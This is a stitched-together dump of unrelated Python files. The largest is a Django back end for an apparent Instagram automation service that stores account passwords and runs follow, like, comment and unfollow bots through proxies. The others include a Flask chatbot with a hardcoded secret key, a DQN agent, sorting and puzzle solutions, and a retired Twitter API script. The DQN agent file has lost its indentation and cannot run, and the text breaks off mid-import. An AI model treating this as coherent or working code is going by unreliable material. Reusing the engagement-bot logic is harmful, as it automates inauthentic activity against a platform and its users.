                return render(request,"profile.html",{"current_proxy":current_proxy,"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"block","pop_up":"add_insta_account_error('Lütfen gelen kodu giriniz eğer kod gelmediyse(5dk ya kadar kod gelmesi gecikebilir) yada yanlış onay çeşidini seçtiyseniz onay kodu yerine 0 yazıp onaylayın ve daha sonra yeniden deneyin')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"none","ig_username_disabled":"block","sms_or_mail":"none","ig_user":username,"ig_user_password":password,"license_data":functions.license_data(request.user)})
            elif check_user == 9:
                challenge_user.delete()
                return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Lütfen farklı bir onay yöntemi deneyiniz.')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"none","ig_username_disabled":"block","sms_or_mail":"block","ig_user":username,"ig_user_password":password,"license_data":functions.license_data(request.user)})
            elif check_user == 10:
                challenge_user.delete()
                return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Lütfen boş yerleri doldurun.')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
            elif check_user == 11:
                challenge_user.delete()
                return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"block","wow2":"none","challenge_code":"none","pop_up":"add_insta_account_error('Çok fazla deneme yaptınız, lütfen daha sonra yeniden deneyiniz.')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
        else:
            return render(request,"profile.html",{"wow":"block","challenge_code":"none","wow2":"none","pop_up":"add_insta_account_error('Bu hesap zaten kayıtlı')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
    else:
        ig_accounts_list=functions.get_linked_accounts(request.user)
        return render(request,"profile.html",{"wow":"none","wow2":"block","challenge_code":"none","pop_up":"add_insta_account_success('Hesap başarıyla eklendi')","user":request.user,"ig_accounts":ig_accounts_list,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none","license_data":functions.license_data(request.user)})
@login_required(login_url='/login/')
def profile(request):
    """Render the profile page with linked accounts, assistants and license.

    Guarantees that at least one SocinstaProxy row exists so the proxy
    selector in the template is never empty.
    """
    instagram_accounts=functions.get_linked_accounts(request.user)
    check_linked_assistants_list=functions.check_linked_assistans(request.user)
    # exists() avoids loading the whole table just to count it.
    if not SocinstaProxy.objects.exists():
        new_proxy = SocinstaProxy(created_date=datetime.now(timezone.utc))
        new_proxy.save()
    all_proxies = SocinstaProxy.objects.all()
    try:
        license_datas = functions.license_data(request.user)
    except Exception:  # was a bare except; no license yet -> show 0
        license_datas = 0
    return render(request,"profile.html",{"all_proxies":all_proxies,"wow":"none","wow2":"block","challenge_code":"none","user":request.user,"ig_accounts":instagram_accounts,"number":len(instagram_accounts),"assistants_list":check_linked_assistants_list,"license_data":license_datas,"ig_username":"block","ig_username_disabled":"none","sms_or_mail":"none"})
#Asssistant Views
@login_required(login_url='/login/')
def select_assistant(request):
    """Walk the user through the assistant-creation wizard.

    POST with 'source' -> render the filter page "<type>_<source>.html";
    POST with 'type'   -> render the source page, unless an assistant of
    that type is already paused (0) or running (1);
    GET                -> render the type selection page.
    """
    ig_accounts_list=functions.get_linked_accounts(request.user)
    if request.POST:
        license_object = License.objects.filter(main_user__username = request.user)[0]
        if license_object.status == 2:
            # status 2 marks an expired license
            return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list,"popup_message":"license_has_expired()"})
        if 'source' in request.POST:
            filters_html = str(request.POST['type']) + '_' + str(request.POST['source']) + '.html'
            return render(request,filters_html,{"ig_accounts":ig_accounts_list})
        elif 'type' in request.POST:
            instagram_account = Instagram_Accounts.objects.filter(main_user__username = request.user,is_current_account = 1)
            if len(instagram_account)==0:
                return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list,"popup_message":"ig_user_was_not_added()"})
            else:
                instagram_account = instagram_account[0]
                assistants = Assistants.objects.filter(instagram_account = instagram_account)
                # Flag which assistant types (0=follow, 1=like, 2=comment)
                # already have a paused or running instance.
                follow_action = 0
                like_action = 0
                comment_action = 0
                for i in assistants:
                    if i.assistant_type == 0:
                        if i.activity_status == 0 or i.activity_status == 1:
                            follow_action = 1
                    if i.assistant_type == 1:
                        if i.activity_status == 0 or i.activity_status == 1:
                            like_action = 1
                    if i.assistant_type == 2:
                        if i.activity_status == 0 or i.activity_status == 1:
                            comment_action = 1
                # NOTE: relies on "and" binding tighter than "or".
                if request.POST['type'] == "follow" and follow_action == 0 or request.POST['type'] == "like" and like_action == 0 or request.POST['type'] == "comment" and comment_action == 0:
                    return render(request,"assistant_source.html",{"type":str(request.POST['type']),"ig_accounts":ig_accounts_list})
                else:
                    return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list,"popup_message":"assistant_already_added()"})
    else:
        return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list})
@login_required(login_url='/login/')
def delete_ig_account(request):
    """Delete the Instagram account named in POST['ig_account'].

    If the deleted account was the active one, the first remaining account
    of the user (if any) is promoted to active.  Always re-renders the
    profile page.
    """
    if not request.POST:
        return profile(request)
    ig_account = Instagram_Accounts.objects.get(username=request.POST["ig_account"])
    was_current = ig_account.is_current_account == 1
    ig_account.delete()
    if was_current:
        try:
            new_active_account = Instagram_Accounts.objects.filter(main_user__username=request.user)[0]
            new_active_account.is_current_account = 1
            new_active_account.save()
        except IndexError:  # was a bare except; no accounts left to promote
            pass
    return profile(request)
@login_required(login_url='/login/')
def delete_ig_account_navbar(request,user):
    """Delete the Instagram account *user* (navbar shortcut).

    Mirrors delete_ig_account(): when the deleted account was the active
    one, the first remaining account of the user (if any) becomes active.
    """
    ig_account = Instagram_Accounts.objects.get(username=user)
    was_current = ig_account.is_current_account == 1
    ig_account.delete()
    if was_current:
        try:
            new_active_account = Instagram_Accounts.objects.filter(main_user__username=request.user)[0]
            new_active_account.is_current_account = 1
            new_active_account.save()
        except IndexError:  # was a bare except; no accounts left to promote
            pass
    return profile(request)
@login_required(login_url='/login/')
def assistants_details(request):
    """Render the action-history table of the user's active IG account.

    Collects like/follow/comment/unfollow actions, sorts them newest-first,
    caps the list at 300 rows and turns each action into a list of display
    strings (Turkish UI labels) consumed by assistants_details.html.
    """
    ig_accounts_list = functions.get_linked_accounts(request.user)
    all_actions_list = []
    active_ig_account = Instagram_Accounts.objects.filter(main_user__username = request.user,is_current_account = 1)
    if len(active_ig_account) == 0:
        active_ig_account = 0  # no active account: the filters below match nothing
    else:
        active_ig_account = active_ig_account[0]
    like_actions = Like_Actions.objects.filter(instagram_account=active_ig_account)
    follow_actions = Follow_Actions.objects.filter(instagram_account=active_ig_account)
    comment_actions = Comment_Actions.objects.filter(instagram_account=active_ig_account)
    unfollow_actions = Unfollow_Actions.objects.filter(instagram_account=active_ig_account)
    for queryset in (like_actions, follow_actions, comment_actions, unfollow_actions):
        all_actions_list.extend(queryset)
    general_actions_list = []
    total_actions = len(all_actions_list)
    # Newest first.
    all_actions_list = sorted(all_actions_list, key=lambda action: action.update_time, reverse=True)
    if request.POST:
        pass
    else:
        if total_actions >= 300:
            all_actions_list = all_actions_list[:300]
    # Display-label lookup tables (Turkish UI strings).
    relationship_labels = {0: "Takipçileri", 1: "Takip ettikleri", 2: "Beğenenler", 3: "Yorum yapanlar"}
    source_labels = {0: "Kullanıcı", 1: "Hashtag", 2: "Lokasyon"}
    assistant_labels = {0: "Takip", 1: "Beğeni", 2: "Yorum", 3: "Takipten Çıkma"}
    status_labels = {0: "Beklemede", 1: "Başarılı", 2: "Başarısız", 9: "Filtreden Geçti", -1: "Filtreye Takıldı"}
    for i in all_actions_list:
        actions_dict = {}
        actions_dict["Kullanıcı adı"] = i.ig_user.username
        actions_dict["Bağlı olduğu hesap"] = i.instagram_account.username
        actions_dict["Kaynak Çeşidi"] = relationship_labels.get(i.relationship, "Takip edilenler")
        actions_dict["Kaynak Türü"] = source_labels.get(i.source_type, "Takip edilenler")
        actions_dict["Geldiği Kaynak"] = i.source
        # BUGFIX: an unknown type/status used to carry over the label from the
        # previous row; now it renders as an empty cell instead.
        actions_dict["Eylem Türü"] = assistant_labels.get(i.assistant.assistant_type, "")
        actions_dict["Status"] = status_labels.get(i.status, "")
        # BUGFIX: the old hand-rolled "+3 hours" shift produced impossible
        # dates (e.g. day 32, wrong month) at month boundaries; timedelta
        # arithmetic rolls over days/months/years correctly.
        local_time = i.update_time + timedelta(hours=3)
        actions_dict["İşlem Zamanı"] = "%d/%d/%d/%02d:%02d" % (local_time.year, local_time.month, local_time.day, local_time.hour, local_time.minute)
        actions_dict["Deneme"] = "✅"
        general_actions_list.append(list(actions_dict.values()))
    return render(request,"assistants_details.html",{"general_actions_list":general_actions_list,"ig_accounts":ig_accounts_list,"total_actions":total_actions})
@login_required(login_url='/login/')
def create_assistant(request):
    """Create a follow/like/comment assistant from the wizard's POST data.

    Normalises checkbox values, builds the relationship string (digits 0-4
    encoding followers/followings/likers/commenters/posters), stores the
    Assistants row plus its Assistants_Settings, and re-attaches pending
    actions left behind by a terminated assistant with the same source.
    """
    instagram_account = Instagram_Accounts.objects.get(main_user__username = request.user,is_current_account=1)
    ig_accounts_list = functions.get_linked_accounts(request.user)
    post = request.POST.copy()
    # Turn "on"/absent checkbox values into 1 and 0.
    for i in post:
        if post.get(i) =='on':
            post[i] = 1
    check_values=["likers","commenters","is_default","is_private","biography","has_anonymous_profile_picture","is_business","followers","followings","posters","comment"]
    for i in check_values:
        if i in post:
            pass
        else:
            post[i]=0
    # Get all POST data.
    likers = post.get("likers")
    commenters = post.get("commenters")
    is_default = post.get("is_default")
    number_of_actions=post.get("number_of_actions")
    max_followers=post.get('max_followers')
    min_followers=post.get('min_followers')
    max_followings=post.get('max_followings')
    min_followings=post.get('min_followings')
    max_posts=post.get('max_posts')
    min_posts=post.get('min_posts')
    is_private=post.get("is_private")
    biography=post.get("biography")
    has_anonymous_profile_picture=post.get("has_anonymous_profile_picture")
    is_business=post.get("is_business")
    followers = post.get('followers')
    followings = post.get('followings')
    username = post.get('user')
    hashtag = post.get('hashtag')
    location = post.get("location")
    posters = post.get("posters")
    speed = post.get("speed")
    comment = post.get("comment")
    # "type" arrives as "<assistant>_<source>", e.g. "follow_hashtag".
    assistant_type = post.get("type").split('_')[0]
    source = post.get("type").split('_')[1]
    if username:
        private_api.check_sources(instagram_account.username,username,source)
    elif hashtag:
        private_api.check_sources(instagram_account.username,hashtag,source)
    else:
        private_api.check_sources(instagram_account.username,location,source)
    # NOTE(review): if "type" is outside follow/like/comment or the source is
    # outside user/hashtag/location, action_name/source_type stay unbound and
    # the code below raises -- presumably the wizard only sends valid values.
    if assistant_type =='follow':
        assistant_type = 0
        action_name = Follow_Actions
    elif assistant_type =='like':
        assistant_type = 1
        action_name = Like_Actions
    elif assistant_type =='comment':
        assistant_type = 2
        action_name = Comment_Actions
    if source == "user":
        source_type = 0
        source = username
    elif source == "hashtag":
        source_type = 1
        source = hashtag
    elif source == "location":
        source_type = 2
        source = location
    # relationship is a digit string: 0=followers, 1=followings, 2=likers,
    # 3=commenters, 4=posters; at least one must be selected.
    relationship = ''
    if followers ==1:
        relationship = relationship + '0'
    if followings ==1:
        relationship = relationship + '1'
    if likers ==1:
        relationship = relationship + '2'
    if commenters ==1:
        relationship = relationship + '3'
    if posters ==1:
        relationship = relationship + '4'
    if relationship == '':
        return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list,"popup_message":"relationship_error('Lütfen kaynak seçini yapın!')"})
    # Create the new assistant.
    assistant = Assistants(instagram_account = instagram_account,assistant_type=assistant_type, source_type=source_type,source=source,relationship=relationship,number_of_actions = number_of_actions,activity_status=1,queue=int(relationship[0]),update_time = datetime.now(timezone.utc),comment = comment)
    assistant.save()
    # Create the new assistant's settings (follow assistants ignore is_private).
    if assistant_type != 0:
        assistant_settings=Assistants_Settings(is_default =is_default,assistant=assistant,min_followers=min_followers,max_followers=max_followers,min_followings=min_followings,max_followings=max_followings,is_private=0,biography=biography,is_business=is_business,max_posts=max_posts,min_posts=min_posts,has_anonymous_profile_picture=has_anonymous_profile_picture,speed=speed)
    else:
        assistant_settings=Assistants_Settings(is_default =is_default,assistant=assistant,min_followers=min_followers,max_followers=max_followers,min_followings=min_followings,max_followings=max_followings,is_private=is_private,biography=biography,is_business=is_business,max_posts=max_posts,min_posts=min_posts,has_anonymous_profile_picture=has_anonymous_profile_picture,speed=speed)
    assistant_settings.save()
    # Adopt pending (status=0) actions of terminated assistants with the
    # same source so previously queued work is not lost.
    for i in relationship:
        actions = action_name.objects.filter(status = 0,relationship = int(i),source_type = source_type,source = source,assistant__activity_status = 3)
        for b in actions:
            assistant.queue = b.assistant.queue
            assistant.save()
            b.assistant = assistant
            b.instagram_account = instagram_account
            b.save()
    return redirect("/dashboard/")
@login_required(login_url='/login/')
def unfollow(request):
    """Create an unfollow assistant (assistant_type=3) for the active account.

    GET renders the unfollow form (unless an unfollow assistant is already
    active or queued); POST creates the assistant plus its settings and,
    when a custom white-list file is uploaded, schedules a Celery task to
    store the usernames that must never be unfollowed.
    """
    ig_accounts_list = functions.get_linked_accounts(request.user)
    active_ig_account = Instagram_Accounts.objects.filter(is_current_account=1,main_user = request.user)
    if len(active_ig_account) == 0:
        return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list,"popup_message":"relationship_error('Devam etmek için hesap ekleyin!')"})
    else:
        active_ig_account = active_ig_account[0]
    # NOTE(review): result unused, but the [0] lookup raises IndexError when
    # no analyse row exists -- confirm whether that is intended as a guard.
    ig_account_analyse = Instagram_Accounts_Analyse.objects.filter(instagram_account=active_ig_account)[0]
    if request.POST:
        post = request.POST.copy()
        noa = int(post.get('number_of_actions'))
        is_default = post.get("is_default")
        speed = post.get('speed')
        unfollow_assistant = Assistants(instagram_account=active_ig_account,number_of_actions = noa,activity_status= 1,update_time = datetime.now(timezone.utc),assistant_type=3,source=active_ig_account.username)
        unfollow_assistant.save()
        unfollow_assistant_settings = Assistants_Settings(assistant=unfollow_assistant,speed=speed)
        unfollow_assistant_settings.save()
        if is_default is None:  # BUGFIX: identity check instead of "== None"
            white_list = request.FILES
            if white_list:
                white_list = white_list['white_list']
                white_list_users = []
                # Uploaded files iterate as byte lines; normalise each username.
                for line in white_list:
                    white_list_users.append(line.decode().strip("\n").strip(",\r").strip(" "))
                tasks.create_white_list_users.apply_async(queue='deneme1',args=[request.user.username,unfollow_assistant.id,white_list_users])
        else:
            # Default white list: only create it once per account.
            white_list_assistant = White_List_Assistant.objects.filter(instagram_account=active_ig_account)
            if len(white_list_assistant) == 0:
                tasks.create_white_list_users.apply_async(queue='deneme1',args=[request.user.username, unfollow_assistant.id])
        return redirect("/dashboard/")
    else:
        unfollow_assistant = Assistants.objects.filter(instagram_account=active_ig_account,assistant_type=3,activity_status=1)
        unfollow_assistant2 = Assistants.objects.filter(instagram_account=active_ig_account,assistant_type=3,activity_status=9)
        if len(unfollow_assistant) + len(unfollow_assistant2) == 0:
            return render(request,"unfollow.html",{"ig_accounts":ig_accounts_list})
        else:
            return render(request,"assistant_type.html",{"ig_accounts":ig_accounts_list,"popup_message":"relationship_error('Asistan zaten aktif!')"})
|
# gevent monkey-patching must run before anything else imports the standard
# library, so sockets/threads become cooperative (needed by Flask-SocketIO).
import gevent.monkey
gevent.monkey.patch_all()
from flask import Flask, render_template, request, redirect
from flask_socketio import SocketIO
import sqlite3
from chatterbot import ChatBot
# Chatbot backed by the pre-trained SQLite database Data.db, opened
# read-only so chats do not pollute the training data.
bot = ChatBot(
    'Terminal',
    storage_adapter='chatterbot.storage.SQLStorageAdapter',
    logic_adapters=[
        {
            'import_path': 'chatterbot.logic.BestMatch',
            'default_response': 'Sorry, I do not understand',
            'maximum_similarity_threshold': 0.8
        },
        {
            'import_path': 'chatterbot.logic.BestMatch',
        }
        # 'chatterbot.logic.TimeLogicAdapter',
    ],
    read_only=True,
    database_uri='sqlite:///Data.db')
app = Flask(__name__)
app.config['SECRET_KEY'] = 'chatbotbeepboop'
socketio = SocketIO(app)
#default page
@app.route("/")
def sessions():
    """Serve the chat page."""
    return render_template("index.html")
#msg received
def messageReceived(methods=('GET', 'POST')):
    """Ack callback invoked after a socket emit succeeds.

    :param methods: unused; kept for backward compatibility.  The default is
        now an immutable tuple -- the old mutable-list default was shared
        between calls.
    """
    print('message was received!!!')
@socketio.on('my event')
def handle_my_custom_event(text, methods=('GET', 'POST')):
    """Answer an incoming chat message over the websocket.

    :param text: event payload dict; the user's input is text['message'].
    :param methods: unused; kept for backward compatibility (the old
        mutable-list default is now a tuple).
    """
    print('received my events_test: ' + str(text))
    server_inp = text['message']
    ans_get = bot.get_response(server_inp)
    print(ans_get)
    # Send both the question and the bot's answer back to the client.
    socketio.emit('my response', {'question': server_inp, 'message': str(ans_get)})
    # BUGFIX: removed `engine.say(str(ans_get))` -- `engine` was never defined
    # or imported anywhere in this module, so every message raised NameError
    # after the emit.  Re-add text-to-speech via pyttsx3 if that is wanted.
#submit chat
@app.route('/submit', methods = ['POST'])
def submit():
    """Handle the chat form POST and bounce back to the index page."""
    message = request.form['message']
    print("The text is '" + message + "'")
    return redirect('/')
# Uncomment the following lines to enable verbose logging
# import logging
# logging.basicConfig(level=logging.INFO)
if __name__ == "__main__":
    # Run through SocketIO (gevent) instead of app.run() so websockets work.
    socketio.run(app, debug=True)
from django.contrib import admin
from django.urls import path, include
from rest_framework.routers import DefaultRouter
from polls.views import PollViewSet
# The router generates the standard list/detail routes for the polls viewset.
router = DefaultRouter()
router.register('polls', PollViewSet, basename='polls')
urlpatterns = [
    path('admin/', admin.site.urls),
    # All DRF endpoints live under /api/ (e.g. /api/polls/).
    path('api/', include(router.urls))
]
|
"""Project Euler 87: count the numbers <= limit expressible as
p**2 + q**3 + r**4 with p, q, r prime.

Modernised from Python 2 (print statements) to Python 3, and the
O(len(primes)) list-membership tests inside the triple loop were replaced
by direct iteration over an ascending prime list with early breaks.
"""
import math

# Upper bound used by the original script (50 million).
DEFAULT_LIMIT = 50 * 10**6


def sieve_primes(limit):
    """Return the ascending list of primes <= limit (sieve of Eratosthenes)."""
    if limit < 2:
        return []
    is_composite = bytearray(limit + 1)
    primes = []
    for n in range(2, limit + 1):
        if not is_composite[n]:
            primes.append(n)
            for multiple in range(n * n, limit + 1, n):
                is_composite[multiple] = 1
    return primes


def count_prime_power_triples(limit=DEFAULT_LIMIT):
    """Count the distinct values p**2 + q**3 + r**4 <= limit with p, q, r prime.

    :param limit: inclusive upper bound for the sums.
    :return: number of distinct representable values.
    """
    # p <= sqrt(limit); q and r are bounded even tighter, so one sieve suffices.
    primes = sieve_primes(int(math.sqrt(limit)) + 1)
    sums = set()
    for p in primes:
        p2 = p * p
        if p2 + 8 + 16 > limit:  # smallest possible q**3 + r**4 is 2**3 + 2**4
            break
        for q in primes:
            q3 = q ** 3
            if p2 + q3 + 16 > limit:
                break
            for r in primes:
                total = p2 + q3 + r ** 4
                if total > limit:
                    break
                sums.add(total)
    return len(sums)


def main():
    """Reproduce the original script's behaviour for the 50 million bound."""
    print("Loading of the primes until", DEFAULT_LIMIT)
    answer = count_prime_power_triples(DEFAULT_LIMIT)
    print("Primes loaded\n")
    print(answer)


if __name__ == "__main__":
    main()
|
# Generated by Django 3.0.3 on 2020-02-08 11:05
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: adjust field definitions on the facts app models."""

    dependencies = [
        ('facts', '0003_auto_20200208_1221'),
    ]
    operations = [
        migrations.AlterField(
            model_name='artist',
            name='artist',
            field=models.CharField(max_length=100),
        ),
        migrations.AlterField(
            model_name='facts',
            name='author',
            field=models.CharField(default='none', max_length=100),
        ),
        migrations.AlterField(
            model_name='facts',
            name='facts',
            field=models.TextField(),
        ),
        migrations.AlterField(
            model_name='song',
            name='id',
            field=models.AutoField(primary_key=True, serialize=False, verbose_name='ID'),
        ),
        migrations.AlterField(
            model_name='song',
            name='song',
            field=models.CharField(max_length=100),
        ),
    ]
|
# -*- coding: utf-8 -*-
"""
Deep Q-network implementation with chainer and rlglue
Copyright (c) 2015 Naoto Yoshida All Right Reserved.
"""
import copy
import pickle
import numpy as np
import cv2
import scipy.misc as spm
import sys
import matplotlib
import matplotlib.pyplot as plt
from chainer import cuda, FunctionSet, Variable, optimizers
import chainer.functions as F
from rlglue.agent.Agent import Agent
from rlglue.agent import AgentLoader as AgentLoader
from rlglue.types import Action
from surface_indices import *
#from dqn_agent_nature import DQN_class
class dqn_agent(Agent): # RL-glue Process
lastAction = Action()
policyFrozen = False
cnt = 0
def agent_init(self, taskSpec):
# Some initializations for rlglue
self.lastAction = Action()
self.time = 0
self.epsilon = 1.0 # Initial exploratoin rate
# Pick a DQN from DQN_class
#self.DQN = DQN_class() # Default is for "Pong".
print 'agent_init done'
def agent_start(self, observation):
returnAction = Action()
returnAction.intArray = [-1]
return returnAction
def agent_step(self, reward, observation):
# Observation display
returnAction = Action()
actNum = -1
#if self.cnt % 100 < 5:
# actNum = (self.cnt // 100) % 9
img = np.zeros((17,17), dtype=np.float32)
for i, v in enumerate(observation.doubleArray[:17*17]):
img[surface_indices[i]] = v
img = (img + 90.0) / 130.0
img = cv2.resize(img, (128, 128))
cv2.imshow('observation',img)
k = cv2.waitKey(0)
if k in [ord(v) for v in '123456789']:
actNum = int(unichr(k)) - 1
if k == 27:
raise NameError('Escape')
returnAction.intArray = [actNum]
self.cnt+=1
return returnAction
def agent_end(self, reward): # Episode Terminated
pass
def agent_cleanup(self):
pass
def agent_message(self, inMessage):
if inMessage.startswith("what is your name?"):
return "my name is skeleton_agent!"
if inMessage.startswith("freeze learning"):
self.policyFrozen = True
return "message understood, policy frozen"
if inMessage.startswith("unfreeze learning"):
self.policyFrozen = False
return "message understood, policy unfrozen"
if inMessage.startswith("save model"):
with open('dqn_model.dat', 'w') as f:
pickle.dump(self.DQN.model, f)
return "message understood, model saved"
if inMessage.startswith("load model"):
with open('dqn_model.dat', 'r') as f:
self.DQN.model = pickle.load(f)
return "message understood, model loaded"
if __name__ == "__main__":
    #AgentLoader.loadAgent(dqn_agent(), "192.168.36.53")
    # Connect to the RL-Glue server; the IP can be overridden on the command line.
    envIP = '127.0.0.1'
    if len(sys.argv) >= 2:
        envIP = sys.argv[1]
    print 'connecting ' + envIP
    try:
        AgentLoader.loadAgent(dqn_agent(), envIP)
    finally:
        cv2.destroyAllWindows()  # always tear down the OpenCV windows
|
from pywss import Pyws, route
# Echo-style websocket handler; pywss passes the incoming payload as `data`.
@route('/test/example/1')
def example_1(request, data):
    """Echo the received payload with a fixed suffix appended."""
    return data + ' - data from pywss'
if __name__ == '__main__':
    # Serve the websocket app on localhost:7006.
    ws = Pyws(__name__, address='127.0.0.1', port=7006)
    #from ipdb import set_trace; set_trace()
ws.serve_forever() |
import cv2
import TD
# Detect text regions in the test image and draw their bounding boxes.
img = cv2.imread('test.jpg')
rect = TD.text_detect(img)  # presumably yields (x1, y1, x2, y2) boxes -- TODO confirm against TD
for i in rect:
    # NOTE(review): newer OpenCV requires the point args to be tuples;
    # confirm the element type returned by TD.text_detect.
    cv2.rectangle(img,i[:2],i[2:],(0,255,0))
cv2.imwrite('img-out.png', img) |
from typing import List
import random
def countingsort(nums: List[int], place: int) -> List[int]:
    """Stable counting sort of non-negative ints by one decimal digit.

    :param nums: values to sort (non-negative integers).
    :param place: power of ten (1, 10, 100, ...) selecting the digit.
    :return: a new list, stably ordered by the selected digit.
    """
    count_list = [0] * 10
    for num in nums:
        # Fix: integer (floor) division. The original `int(num / place)`
        # goes through float and loses precision for very large integers.
        count_list[(num // place) % 10] += 1
    # Prefix sums turn digit counts into final (exclusive-end) positions.
    for i in range(1, 10):
        count_list[i] += count_list[i - 1]
    results = [0] * len(nums)
    # Walk backwards so equal digits keep their relative order (stability),
    # which LSD radix sort relies on.
    for num in reversed(nums):
        index = (num // place) % 10
        results[count_list[index] - 1] = num
        count_list[index] -= 1
    return results


def radixsort(nums: List[int]) -> List[int]:
    """LSD radix sort for non-negative integers; returns a new sorted list."""
    if not nums:  # max() would raise ValueError on an empty list
        return nums
    max_num = max(nums)
    place = 1
    # Fix: `place <= max_num` (the original used `<`), otherwise the most
    # significant digit is never sorted: e.g. [10, 9, 2] came back unsorted.
    while place <= max_num:
        nums = countingsort(nums, place)
        place *= 10
    return nums
if __name__ == "__main__":
    # Demo run on random data. (The previous fixed example list was dead
    # code: it was overwritten by the random list on the very next line.)
    nums = [random.randint(0, 1000) for _ in range(10)]
    print(radixsort(nums))
|
import optproblems.cec2005
import numpy as np
import time
from IA import *
import os
def IAalgorithm(n_parties, politicians, R, function, function_index, max_evaluations, desertion_threshold):
    """Run one Ideology Algorithm optimisation and return its result vector.

    The returned array is the convergence marks followed by the run's best
    solution value (the reporting code below relies on that layout).
    """
    IA = IdeologyAlgorithm(n_parties=n_parties, politicians=politicians, R=R, function=function,
                           function_index=function_index, max_evaluations=max_evaluations, desertion_threshold=desertion_threshold)
    return IA.ideology_algorithm()


def _run_benchmark(function_index, description, dim, repeats, evaluations,
                   parties, politicians, r, desertion_threshold):
    """Benchmark one CEC2005 function `repeats` times.

    Writes the summary to results/IA-results-<dim>-<idx>.txt and the mean
    convergence trace to convergence/IA-convergence-<dim>-<idx>.csv --
    exactly what the five previously copy-pasted stanzas did.
    """
    np.random.seed(10)  # identical seed before every benchmark, as before
    function = getattr(optproblems.cec2005, "F{}".format(function_index))(dim)
    time1 = time.time()
    results = np.array([IAalgorithm(n_parties=parties, politicians=politicians,
                                    R=r, function=function, function_index=function_index,
                                    max_evaluations=evaluations,
                                    desertion_threshold=desertion_threshold) for _ in range(repeats)])
    total_time = time.time() - time1
    means = results.mean(axis=0)
    solutions = results[:, -1]  # last column: each run's final solution value
    mean_best = means[-1]
    min_sol = np.min(solutions)
    max_sol = np.max(solutions)
    marks = means[0:-1]  # everything before the last column: convergence trace
    with open("results/IA-results-{}-{}.txt".format(dim, function_index), "w") as file:
        print(description, file=file)
        print("Min\t Max\t Mean\t Mean time", file=file)
        print("_______________________________________________", file=file)
        print("{} {} {} {}".format(min_sol, max_sol, mean_best, total_time / repeats), file=file)
    with open("convergence/IA-convergence-{}-{}.csv".format(dim, function_index), "w") as file:
        for i in range(len(marks)):
            print("{},{}".format(10000 * i, marks[i]), file=file)


if __name__ == "__main__":
    dim = 10
    repeats = 10
    evaluations = 10000 * dim
    parties = 5
    politicians = 30
    r = 0.5
    desertion_threshold = 10
    if not os.path.exists('results'):
        os.makedirs('results')
    if not os.path.exists('convergence'):
        os.makedirs('convergence')
    # One entry per benchmarked CEC2005 function. This loop replaces five
    # near-identical ~20-line copy-pasted blocks.
    benchmarks = [
        (2, "F2: Shifted Schwefel's Problem 1.2"),
        (7, "F7: Shifted Rotated Griewank's Function without Bounds"),
        (13, "F13: Expanded Extended Griewank's plus Rosenbrock's Function (F8F2)"),
        (17, "F17: Rotated Hybrid Composition Function with Noise in Fitness"),
        (18, "F18: Rotated Hybrid Composition Function"),
    ]
    for function_index, description in benchmarks:
        _run_benchmark(function_index, description, dim, repeats, evaluations,
                       parties, politicians, r, desertion_threshold)
|
#!/usr/bin/env python
import json
import sys
import urllib2
# NOTE(review): this script targets the long-retired Twitter Search API v1
# over plain HTTP and is Python 2 only (`urllib2`, `raw_input`, print
# statements); it no longer works against today's API.
twitter_url = 'http://search.twitter.com/search.json?q=from:{username}'
def main():
    """Prompt for a username and print their five most recent tweets."""
    print 'What username would you like to display?'
    username = raw_input('> ')
    message = '\nMost recent tweets from @{0}'.format(username)
    print message
    print '=' * len(message.strip())
    print '' # empty string for a blank line
    ## Fetch the users feed
    response = urllib2.urlopen(twitter_url.format(username=username))
    data = json.loads(response.read())
    ## No results? I has a sad. :(
    if not data['results']:
        print 'Sorry bub, nothing to display for @{0}\n'.format(username)
        return
    ## Print the most recent tweets
    for tweet in data['results'][:5]:
        print tweet['created_at']
        print tweet['text']
        print ''
if __name__ == '__main__':
    sys.exit(main())
|
# -*- coding: utf-8 -*-
from collections import deque
class Color:
    # Labels used for the 2-coloring in the bipartiteness check.
    BLACK = 0
    WHITE = 1
class Solution:
    def possibleBipartition(self, N, dislikes):
        """Return True when people 1..N can be split into two groups such
        that no `dislikes` pair [i, j] lands in the same group."""
        return self.isBipartite(self.toGraph(range(N), dislikes))
    def toGraph(self, vertices, edges):
        """Build a 0-indexed undirected adjacency list from 1-indexed pairs."""
        adjacency = [[] for _ in vertices]
        for u, v in edges:
            adjacency[u - 1].append(v - 1)
            adjacency[v - 1].append(u - 1)
        return adjacency
    def isBipartite(self, graph):
        """Check 2-colorability with an iterative DFS over every component."""
        coloring = {}
        for start in range(len(graph)):
            if start in coloring:
                continue  # already reached from an earlier component
            pending = deque([start])
            coloring[start] = Color.BLACK
            while pending:
                vertex = pending.pop()
                opposite = Color.WHITE if coloring[vertex] == Color.BLACK else Color.BLACK
                for neighbor in graph[vertex]:
                    if neighbor not in coloring:
                        coloring[neighbor] = opposite
                        pending.append(neighbor)
                    elif coloring[neighbor] == coloring[vertex]:
                        return False  # same color on both ends of an edge
        return True
if __name__ == "__main__":
    # Smoke tests: the three LeetCode 886 examples.
    solution = Solution()
    assert solution.possibleBipartition(4, [[1, 2], [1, 3], [2, 4]])
    assert not solution.possibleBipartition(3, [[1, 2], [1, 3], [2, 3]])
    assert not solution.possibleBipartition(5, [[1, 2], [2, 3], [3, 4], [4, 5], [1, 5]])
|
from torch.nn import (
AvgPool2d,
Conv2d,
CrossEntropyLoss,
